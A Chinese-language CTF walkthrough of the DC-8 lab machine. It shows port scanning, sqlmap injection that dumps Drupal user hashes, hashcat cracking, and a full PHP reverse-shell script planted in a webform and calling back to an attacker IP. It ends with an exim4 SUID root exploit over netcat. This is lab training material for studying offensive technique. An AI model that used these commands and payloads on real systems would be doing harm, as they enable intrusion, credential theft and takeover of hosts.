DC-8

author:leadlife

data:2023/5/18

blog:https://tripse.github.io/

本次测试使用到的工具如下:

  • 信息收集:nmap、fscan、cmseek、searchsploit
  • 获取 SHELL:无
  • 漏洞利用:SQLmap
  • 暴力破解:hashid、hashcat
  • FUZZ:无
  • 辅助工具:无
  • 权限提升:无

外部信息收集

Nmap ICMP 扫描发现主机

本次靶机 IP 10.10.10.138

1
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
1
2
3
4
5
6
7
8
9
10
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:09 CST
Nmap scan report for 10.10.10.138
Host is up (0.00020s latency).
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:EF:7D:81 (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds

Fsacn 探测开放端口

1
sudo fscan -h 10.10.10.138 -p 0-65535 -t 30
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.138    is alive
[*] Icmp alive hosts len is: 1
10.10.10.138:22 open
10.10.10.138:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://10.10.10.138       code:200 len:7924   title:Welcome to DC-8 | DC-8
已完成 2/2
[*] 扫描结束,耗时: 5.851445651s⏎

Nmap 进行详细端口扫描

1
2
sudo nmap -sS -sV -sC -O -T4 --min-rate 10000 -oN nmap.all 10.10.10.138 -p22,80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:10 CST
Nmap scan report for 10.10.10.138
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
|   256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_  256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

判断 CMS

访问 web 页面发现是 drupal

image-20230518201112021

CMSeek 判断 CMS 版本

image-20230518201148236

searchsploit 搜寻 cms 版本漏洞

drupal 7 版本存在 RCE 以及 SQL

image-20230518201329208

获取 SHELL

尝试利用 exp

均失败,这里怀疑作者做了一些修改,也有可能是环境原因,那么进行手工测试

SQL 注入获取 Hash

1
http://10.10.10.138/?nid=1
1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment

获取数据库:

1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment --dbs

image-20230518203748672

获取表名:

1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db --tables
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
+-----------------------------+
| block                       |
| cache                       |
| filter                      |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+

获取 users 字段:

1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users --columns

image-20230518203928085

获取账户密码:

1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users -C "name,pass" --dump
1
2
3
4
5
6
7
8
9
Database: d7db
Table: users
[2 entries]
+--------+---------------------------------------------------------+
| name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+

识别 hash

image-20230518204303257

离线破解 Hash

尝试在线站点破解,失败,操作离线破解,先用 hashid 拿到编号

1
2
3
4
leadlife@endeavrouOS /o/s/tamper> hashid -m
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
Analyzing '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[+] Drupal > v7.x [Hashcat Mode: 7900]
1
hashcat -a 0 -m 7900 hash.txt /usr/share/seclists/Passwords/probable-v2-top12000.txt

拿到 john 的密码:

1
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF:turtle

后台 GetSHELL

登入后台:http://10.10.10.138/user/

image-20230518205720313

点击 Contact Us:

image-20230518205815918

再点击 Webform,可直接添加 php 代码进行 getshell

image-20230518205615800

编辑内容为 php-reverse-shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
<p>Thanks for taking the time to contact us. We shall be in contact soon.</p>
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>

修改为 php-code 最后保存即可,本地监听:

1
nc -lvnp 1234

随便编辑内容提交,即可反弹 SHELL

image-20230518210054929

image-20230518210104621

优化 SHELL

1
2
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ export TERM=xterm

内部信息收集

内核与发行版

image-20230518210153213

SUID

exim4

image-20230518210209068

SUDO

no sudo

image-20230518210225339

权限提升

利用 SUID exim4 提权

利用 Python 传输,然后运行即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
www-data@dc-8:/tmp$ bash 46996.sh -m netcat
bash 46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Thu, 18 May 2023 23:22:48 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1pzdai-0004rL-Bo
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# cd /root
root@dc-8:/root# ls
flag.txt
root@dc-8:/root# cat flag.txt


Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.